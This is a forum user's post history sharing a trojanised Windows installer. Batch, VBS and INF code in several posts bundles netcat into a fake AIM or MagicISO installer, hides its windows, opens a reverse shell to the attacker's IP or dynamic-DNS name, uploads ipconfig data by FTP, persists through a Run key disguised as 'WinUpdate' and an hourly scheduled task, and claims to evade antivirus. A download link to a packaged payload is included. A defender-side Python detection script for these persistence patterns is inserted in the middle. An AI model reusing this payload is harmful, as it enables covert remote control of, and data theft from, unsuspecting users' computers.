javabudd
Everything posted by javabudd

  1. I think it's time for an update...Got some good ideas we can use!
  2. @jen/thedadymac The program is created so that they connect to you, regardless of a router. The reason the router doesn't matter is because we are using a reverse shell method, which has the victim send a connection request to the attacker (who has his ports forwarded on his router). If you need some help, PM me or something.
  3. So today, I randomly started messing around with this payload and I thought about a few problems that one could have when using it. First off, the way the reverse shell works is that the infected computer sends out a request to connect to the attacker's computer (spawning a cmd), which is done by putting your WAN IP address in the setup.inf file and others. The problem here is that most internet users do not have a static IP address, which means when your ISP changes your IP address, the reverse shell no longer works. A fix to this is a sweet program/website I found called no-ip DUC (www.no-ip.com). What this website does is allow you to create a free domain name, and using the program they offer, it auto-updates your WAN IP to the domain you registered at the website. In short, if you're running the no-ip program it will check your current WAN IP and update it to your domain name accordingly. So instead of typing in your IP address in the setup.inf files, you would type your domain (plcommando.no-ip.org) (remember not to include the www.). The second flaw that I found is that when you are using this program, you have to wait for them to connect to you, which is a bitch. In some previous versions, I tried using the "at" command to schedule a reverse shell interactively every few hours, but on newer versions of Windows (Vista, 7) the "at" command cannot be run interactively (can't execute programs). A solution to this is to use the new "schtasks" command to schedule the tasks a hell of a lot easier. Instead of having 20 different jobs to schedule when you want them to connect to you, this new command makes them all possible in 1, and can be run interactively. The command is (schtasks /create /IT /SC HOURLY /TN "TASKNAME" /TR "C:\windows\system32\hidec.exe /w nc.exe -e cmd.exe "YOUR DOMAIN" "YOUR PORT") which sends a reverse shell every hour and can be switched to minutes, seconds, etc.
     This way you only have 1 job hidden next to several that Microsoft has in there by default. That's all I got, my fingers hurt... <3 sable
  4. Wow Sable, I'm so glad this forum is still up!! I formatted my comp and forgot to back up all this shit, but thankfully it's here. <3
  5. Java v2.0
     Current Progress on Java Installer Payload v2.0
     • Completely Stealthed
     • Bound to aim.exe (or any .exe installer you like)
     • Reverse shell on port 69
     • WORKS EVEN IF VICTIM HAS A ROUTER
     • Implements an ipconfig /all > %computername%.txt
     • Uploads "%computername%.txt" to an FTP server (I am going to include the code but with my FTP info taken out)
     • Hidden.vbs and nircmd.exe used to never open up a cmd window (Installation and execution of nc.exe is never displayed)
     • WILL EXPLAIN SETUP.INF AND INSTALLATION FURTHER DOWN
     • And last but hopefully not the least, antivirus does not pick up any of it. :D:D

     Teh Codez

     jvabd.bat:
     @echo off
     :: Executing IPCONFIG and creating .txt
     ipconfig /all > c:WindowsSystem32%Computername%.txt
     cls
     :: Executing Script to send ipaddr to ftp :D
     CALL .hidden.vbs script.bat
     :: Quitting
     GOTO End
     :End

     hidden.vbs:
     CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

     script.bat (MAKE SURE YOU EDIT THE NECESSARY FIELDS):
     @ECHO OFF
     :: Create the temporary script file
     > script.ftp ECHO USER YOURUSERNAME
     >>script.ftp ECHO PASSWORD
     >>script.ftp ECHO binary
     >>script.ftp ECHO prompt n
     >>script.ftp ECHO put "C:WindowsSystem32%computername%.txt"
     >>script.ftp ECHO QUIT
     ::Connect to the ftp and run the script
     FTP -v -s:script.ftp FTPSERVER
     :: Overwriting the temp script so this never happened :D
     TYPE NUL >script.ftp
     DEL script.ftp
     EXIT

     Setup.inf (MAKE SURE YOU EDIT THE NECESSARY FIELDS):
     ; This INF File will install netcat in the TARGET system32 directory and implement the following command
     ; "nc.exe -e cmd.exe 0.0.0.0 69"; where 0.0.0.0 is YOUR EXTERNAL ip address
     ; After the installation a registry key will be added on the victim's computer to connect to 0.0.0.0 69
     ; any time you create a listen server on your computer
     ; Let's Begin:
     [Version]
     Signature="$Chicago$"
     AdvancedINF=2.0
     [DefaultInstall]
     Copyfiles=install.files
     Copyfiles=installer.files
     RunPostSetupCommands=RunPostSetupCommandsSection
     AddReg=Add.Settings
     [DestinationDirs]
     ; If you are using a different .exe installer switch the directory HERE
     install.files=30,/Windows/System32
     installer.files=30,/Program Files/AOL Instant Messenger
     [install.files]
     ; These are the pwnage programs that will be installed into system32
     jvabd.bat ; ipconfig /all txt creator
     script.bat ; autoconnect to ftp and upload ipconfig txt :D
     nc.exe ; netcat of course
     nircmd.exe ; hides cmd window
     hidden.vbs ; hides cmd window while executing a batch in a batch
     setup.inf ; inf file
     [installer.files]
     ; The aim installer that installs into /program files/aol instant messenger ;)
     ; TO ADD DIFFERENT .EXE INSTALLERS REMOVE AIM.EXE AND REPLACE WITH YOUR.EXE
     aim.exe
     [Add.Settings]
     ; Adding registry key to make nc run on boot :D
     ; Input your IP address into 0.0.0.0 and make sure you have port 69 forwarded to receive the reverse shell :D
     HKLM,SoftwareMicrosoftWindowsCurrentVersionRun,WinUpdate, 0x00000000, "C:WindowsSystem32nircmd execmd nc.exe -e cmd.exe 0.0.0.0 69"
     [RunPostSetupCommandsSection]
     ; Programs are going to be listed in order of execution, including parameters (nc :D):
     ; ONCE AGAIN CHANGE 0.0.0.0 TO YOUR EXTERNAL IP
     ; If you have a different .exe installer replace aim.exe with your.exe once again
     nircmd.exe execmd CALL nc.exe -e cmd.exe 0.0.0.0 69
     nircmd.exe execmd CALL jvabd.bat
     aim.exe
     [SourceDiskNames]
     1="default",,1

     Instructions on creating the installer

     Once you have created the jvabd.bat, hidden.vbs, script.bat and setup.inf, it's time to compile these programs into 1 cabinet .exe installer. Create a folder and name it whatever the fuck you want, and inside this folder include the following things: nc.exe, nircmd.exe, jvabd.bat, script.bat, setup.inf, hidden.vbs, and the installer of your choice. Don't worry; when you run the compiled version only the installer is shown, everything else gets stealth installed.
     Now, when you have these 7 things inside a folder it's time to compile them into one. *Note* I have not found a method of doing this on Linux or Mac yet, being as they don't use .exe's. Click Start - Run - iexpress.exe. Choose "Create new..." then click on "Extract files then run an installation command". Create a package title (I did AIM 5.9.8), then decide whether or not you want a confirmation message (This will install blah blah, are you sure?). Next skip the license crap and you will see "Package Files". Click Add, browse to your folder with the pwnage in it, and add all 7 items (including your .exe installer). Click Next; on the next screen under "Install Program" choose SETUP.INF, not YOUR .EXE INSTALLER, and leave the post install command. Click Next, leave the show window setting at recommended, click Next, create a finished message if you like. Click Next, name your installer.exe and choose the place you want to save it, also check "Hide file extracting progress animation from user". Choose no restart, and on the next screen save your project if you want. Click Next, create the package, and you now have a legit installer that includes pwnage :D. **IF YOU USE THIS AND GET FUCKED IT'S NOT MY FAULT**
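Posts 3 and 5 above describe two places where the netcat shell is made persistent: a Scheduled Task whose hourly action is hidec.exe /w nc.exe -e cmd.exe <domain> <port>, and an HKLM ...\Run value named WinUpdate that runs nircmd execmd nc.exe -e cmd.exe <ip> 69. The script below is an added example written from the defender's side; it is not code from these posts. It takes command lines collected from those two locations and flags netcat invocations that hand a shell to a remote peer, separating the reverse-shell form (host and port after -e) from the bind-shell form (-L/-l with -p) that posts 10 and 11 mention, and noting the extra traits the posts rely on: a console-hiding wrapper, a free dynamic-DNS callback name, and a recurring trigger. The record layout (source, name, schedule, command), the function names, and every sample value (task names, the no-ip.org hostname, the 203.0.113.10 address) are constructed for this example, and the list of dynamic-DNS zones is illustrative rather than exhaustive.

```python
"""Defender-side triage of netcat persistence command lines.

Added example; not code from the forum posts above. The record layout,
helper names and all sample values below are constructed for illustration.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# netcat-family binary followed, somewhere later, by "-e <shell>"
SHELL_RE = re.compile(
    r"\b(?:nc|ncat|netcat)(?:\.exe)?\b.*?\s-e\s+([\w.\\:-]*(?:cmd|powershell)(?:\.exe)?)",
    re.IGNORECASE,
)
# console-hiding launchers the posts use so that no cmd window appears
HIDER_RE = re.compile(r"\b(?:hidec|nircmd|nircmdc)(?:\.exe)?\b", re.IGNORECASE)
# listen mode and its port: "-L"/"-l" ... "-p <port>" (bind shell)
LISTEN_RE = re.compile(r"\s-[lL]\b")
LISTEN_PORT_RE = re.compile(r"\s-p\s+(\d{1,5})\b")
# "<host> <port>" positional arguments after "-e <shell>" (reverse shell)
TARGET_RE = re.compile(r"-e\s+\S+\s+([\w.-]+)\s+(\d{1,5})\b", re.IGNORECASE)
# free dynamic-DNS zones (the posts rely on no-ip.org); illustrative list
DDNS_RE = re.compile(
    r"\b[\w-]+\.(?:no-ip\.(?:org|com|biz|info)|ddns\.net|dyndns\.org|"
    r"duckdns\.org|hopto\.org|zapto\.org)$",
    re.IGNORECASE,
)
RECURRING = {"MINUTE", "HOURLY", "DAILY", "ONLOGON", "ONSTART"}


@dataclass
class Finding:
    source: str                      # "schtasks" or "run_key"
    name: str                        # task name or Run value name
    mode: str                        # "reverse" (dials out) or "bind" (listens)
    shell: str                       # program handed to the peer via -e
    host: str                        # callback host (reverse mode only)
    port: str
    reasons: List[str] = field(default_factory=list)

    @property
    def severity(self) -> str:
        # "-e <shell>" alone is worth a look; a hidden console, a dynamic-DNS
        # callback and a recurring trigger each add one more reason
        return "high" if len(self.reasons) >= 3 else "medium"


def analyze(entry: Dict[str, str]) -> Optional[Finding]:
    """Return a Finding if the command line runs netcat with -e <shell>, else None."""
    # drop quoting and collapse whitespace so the positional regexes line up
    cmd = " ".join(entry["command"].replace('"', " ").split())
    shell_match = SHELL_RE.search(cmd)
    if not shell_match:
        return None  # plain listener or unrelated program: not this pattern
    shell = shell_match.group(1)
    host = port = ""
    if LISTEN_RE.search(cmd):
        mode = "bind"
        m = LISTEN_PORT_RE.search(cmd)
        port = m.group(1) if m else ""
        why = f"bind shell: netcat listens on port {port or '?'} and hands {shell} to whoever connects"
    else:
        mode = "reverse"
        m = TARGET_RE.search(cmd)
        if m:
            host, port = m.group(1), m.group(2)
        why = f"reverse shell: netcat dials {host or '?'}:{port or '?'} and hands {shell} to the listener"
    f = Finding(entry["source"], entry["name"], mode, shell, host, port, [why])
    if HIDER_RE.search(cmd):
        f.reasons.append("launched through a console-hiding wrapper (hidec/nircmd)")
    if host and DDNS_RE.search(host):
        f.reasons.append(f"callback host is a free dynamic-DNS name: {host}")
    schedule = entry.get("schedule", "").upper()
    if schedule in RECURRING:
        f.reasons.append(f"recurring trigger ({schedule}) re-establishes the session")
    return f


def scan(entries: List[Dict[str, str]]) -> List[Finding]:
    """Analyze every record and keep the findings, in input order."""
    return [f for f in (analyze(e) for e in entries) if f is not None]


# Constructed sample inventory: scheduled-task actions and HKLM\...\Run values
# as a collector might emit them. Names, hosts and addresses are invented.
SAMPLE_ENTRIES = [
    {"source": "schtasks", "name": "VendorUpdateCheck", "schedule": "DAILY",
     "command": r"C:\Program Files\Vendor\updater.exe /check"},
    {"source": "schtasks", "name": "TASKNAME", "schedule": "HOURLY",
     "command": r'C:\windows\system32\hidec.exe /w nc.exe -e cmd.exe "constructed-host.no-ip.org" "69"'},
    {"source": "run_key", "name": "WinUpdate",
     "command": r"C:\Windows\System32\nircmd execmd nc.exe -e cmd.exe 203.0.113.10 69"},
    {"source": "run_key", "name": "NetcatBind",
     "command": r"C:\tools\nc.exe -L -d -p 69 -e cmd.exe"},
    {"source": "run_key", "name": "PlainListener",
     "command": r"C:\tools\nc.exe -l -p 8080 -v"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_ENTRIES):
        print(f"[{f.severity}] {f.source}:{f.name} ({f.mode})")
        for r in f.reasons:
            print("   -", r)
```

Run stand-alone it prints one line per finding plus its reasons; the two reverse shells and the bind shell are reported, while the vendor updater and the listener that exports no shell are not. In practice the records would come from an export of Scheduled Task actions and the HKLM and HKCU Run keys, which this example does not collect; the value of the triage is in the pairing of netcat's -e switch with a shell, not in the file name, so a renamed binary would need a hash- or behaviour-based check instead.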
  6. HEY Sable, you're gonna like this one. I finally was able to incorporate a method to send their IP information. I created a few proggies to ipconfig /all the comp and create a text file ipaddr.txt in the sys32 directory. The other proggy automatically connects to my FTP (no username or password needed because it's already in the script :D) and uploads ipaddr.txt. This whole process takes about 1.3 seconds. Talk to me on AIM if you want the code, I can't give it away here cuz it has my FTP info :/ Oh btw, you can scratch "get External IP" from upcoming additions :D
  7. Shout out to Sable and his switchblade :D. If anyone has any ideas on what we should add, let us know and we will try and implement them... commando payload v2 = GG
  8. I got this installer perfected. Here's the link http://www.mediafire.com/?5i1ljjy9xcj. In the RAR is the fake MagicISO installer and the INF file I made. Read through the INF, then you will understand what happens when you execute the installer. Happy Hacking!
  9. Yes, but could you explain your situation a little better?
  10. **Edit** I changed the cabinet installer to put a directory in the Windows folder named Attreb. Inside this folder is nc and all that shit. The only problem I'm having right now is adding this key to the registry so it auto-runs nc -L -d -p 69 -e cmd.exe. I'm using INF files, anyone have any ideas?
  11. I've got a perfect iexpress installer that I made that throws NC into %sys32%, and with the switches -L and -d netcat stays open even if they ctrl alt del it. And I'm also trying to add something that adds a registry key to HKLM/microsoft/windows/currenversion/run; anything in that key is run on startup with no questions asked and runs perfectly stealthed :D